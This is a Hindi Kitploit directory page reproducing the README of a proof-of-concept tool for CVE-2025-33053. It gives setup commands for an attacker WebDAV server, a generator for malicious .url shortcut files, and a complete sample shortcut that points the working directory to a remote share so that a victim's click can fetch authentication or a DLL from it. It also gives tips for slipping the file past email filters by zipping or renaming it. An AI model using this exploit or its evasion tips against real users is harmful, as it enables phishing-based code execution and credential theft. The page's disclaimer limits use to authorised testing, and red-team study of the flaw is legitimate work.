Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-33053-Proof-Of-Concept — CVE-2025-33053 प्रूफ ऑफ कॉन्सेप्ट (PoC) | Kitploit
उपकरण/GitHubGitHub/devbuihieu/cve-2025-33053-proof-of-concept
पेलोड जनरेशनशोषणपार्श्व आंदोलनफिशिंगवेब सुरक्षापेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलसामाजिक इंजीनियरिंगरेड टीमिंग

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
GitHubdevbuihieu/cve-2025-33053-proof-of-concept

CVE-2025-33053-Proof-Of-Concept

CVE-2025-33053 प्रूफ ऑफ कॉन्सेप्ट (PoC)

रिपॉजिटरी देखें
6416131 साल पहलेKitploit द्वारा समीक्षित
साझा करें

CVE-2025-33053 प्रूफ ऑफ कॉन्सेप्ट

यह रिपॉजिटरी Apache2 का उपयोग करके Ubuntu पर स्वचालित रूप से WebDAV सर्वर तैनात करने, और फिशिंग, रेड टीमिंग या लेटरल मूवमेंट सिमुलेशन में उपयोग के लिए दुर्भावनापूर्ण .url शॉर्टकट फ़ाइलें उत्पन्न करने के लिए स्क्रिप्ट प्रदान करती है।


📁 सामग्री

  • setup_webdav.sh – Apache2 + WebDAV कॉन्फ़िगर करने के लिए Bash स्क्रिप्ट।
  • setup_webdav.py – उपरोक्त का Python संस्करण।
  • gen_url.py – UNC/WebDAV पथों के साथ .url शॉर्टकट फ़ाइलें उत्पन्न करने के लिए Python स्क्रिप्ट।
  • README.md – दस्तावेज़ीकरण।

🔧 आवश्यकताएँ

  • OS: Ubuntu 20.04 या नया (Debian-संगत)
  • रूट विशेषाधिकार (sudo)
  • Python 3.x

🚀 सेटअप निर्देश

1. WebDAV सर्वर (Bash के माध्यम से)

sudo bash setup_webdav.sh

या Python का उपयोग करके:

sudo python3 setup_webdav.py

डिफ़ॉल्ट रूप से, स्क्रिप्ट निम्नलिखित करेगी:

  • Apache और आवश्यक WebDAV मॉड्यूल स्थापित करना।
  • /var/www/webdav पर एक साझा निर्देशिका बनाना।
  • DAV और DAV_FS मॉड्यूल सक्षम करना।
  • DavLockDB निर्देशिका बनाना (Apache DAV लॉकिंग त्रुटियों को रोकने के लिए)।
  • Apache सेवा को पुनरारंभ करना।

📎 WebDAV पथ: http://<your-ip>/webdav/


💣 एक दुर्भावनापूर्ण .url शॉर्टकट उत्पन्न करना

उपयोग उदाहरण:

python3 gen_url.py --ip 192.168.1.100 --out doc.url

सभी विकल्प:

python3 gen_url.py \
  --ip 《YOUR IP ADDRESS》\
  --share 《YOUR SHARE NAME》(Default: webdav) \
  --out 《YOUR OUTPUT FILENAME.url》(Default: bait.url) \
  --exe "C:\Program Files\Internet Explorer\iediagcmd.exe" \
  --icon "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe" \
  --index 13 \
  --modified 20F06BA06D07BD014D

यह निम्नानुसार एक .url फ़ाइल बनाएगा:

[InternetShortcut]
URL=C:\Program Files\Internet Explorer\iediagcmd.exe
WorkingDirectory=\\192.168.1.100\webdav\
ShowCommand=7
IconIndex=13
IconFile=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Modified=20F06BA06D07BD014D

📌 इस फ़ाइल पर क्लिक करने से (कुछ कॉन्फ़िगरेशन में) लक्ष्य सिस्टम आपके WebDAV सर्वर से स्वतः कनेक्ट हो सकता है (प्रमाणीकरण या DLL वितरण)।


🔒 सुरक्षा परीक्षण के लिए नोट्स

  • फ़ायरवॉल अक्षम करें (या पोर्ट 80 खोलें) यदि स्थानीय नेटवर्क पर परीक्षण कर रहे हैं:
    sudo ufw allow 80
    
  • .url फ़ाइलें निम्नलिखित पर निर्भर करते हुए अपेक्षित रूप से निष्पादित नहीं हो सकती हैं:
    • समूह नीति प्रतिबंध
    • एप्लिकेशन डिफ़ॉल्ट
    • ईमेल क्लाइंट (Gmail उन्हें सैनिटाइज़ कर सकता है)
  • फ़िल्टर को बायपास करने के लिए आपको .url को ज़िप करने या .txt में नाम बदलने की आवश्यकता हो सकती है।

⚠️ कानूनी अस्वीकरण

यह रिपॉजिटरी केवल शैक्षिक और अधिकृत पेनिट्रेशन परीक्षण के लिए है।
इन स्क्रिप्ट का उपयोग उन सिस्टमों के विरुद्ध न करें जिनके आप स्वामी नहीं हैं या जिनका परीक्षण करने की अनुमति नहीं है।


🧠 संदर्भ

  • WebDAV सर्वर सेटअप - LinuxConfig.org
  • WebDAV Apache कॉन्फ़िगरेशन - Peter Girnus
  • Microsoft WebDAV दस्तावेज़

📬 संपर्क

प्रश्नों या नैतिक रेड टीमिंग अनुरोधों के लिए, GitHub issues के माध्यम से संपर्क करें।

टूल डाउनलोड करें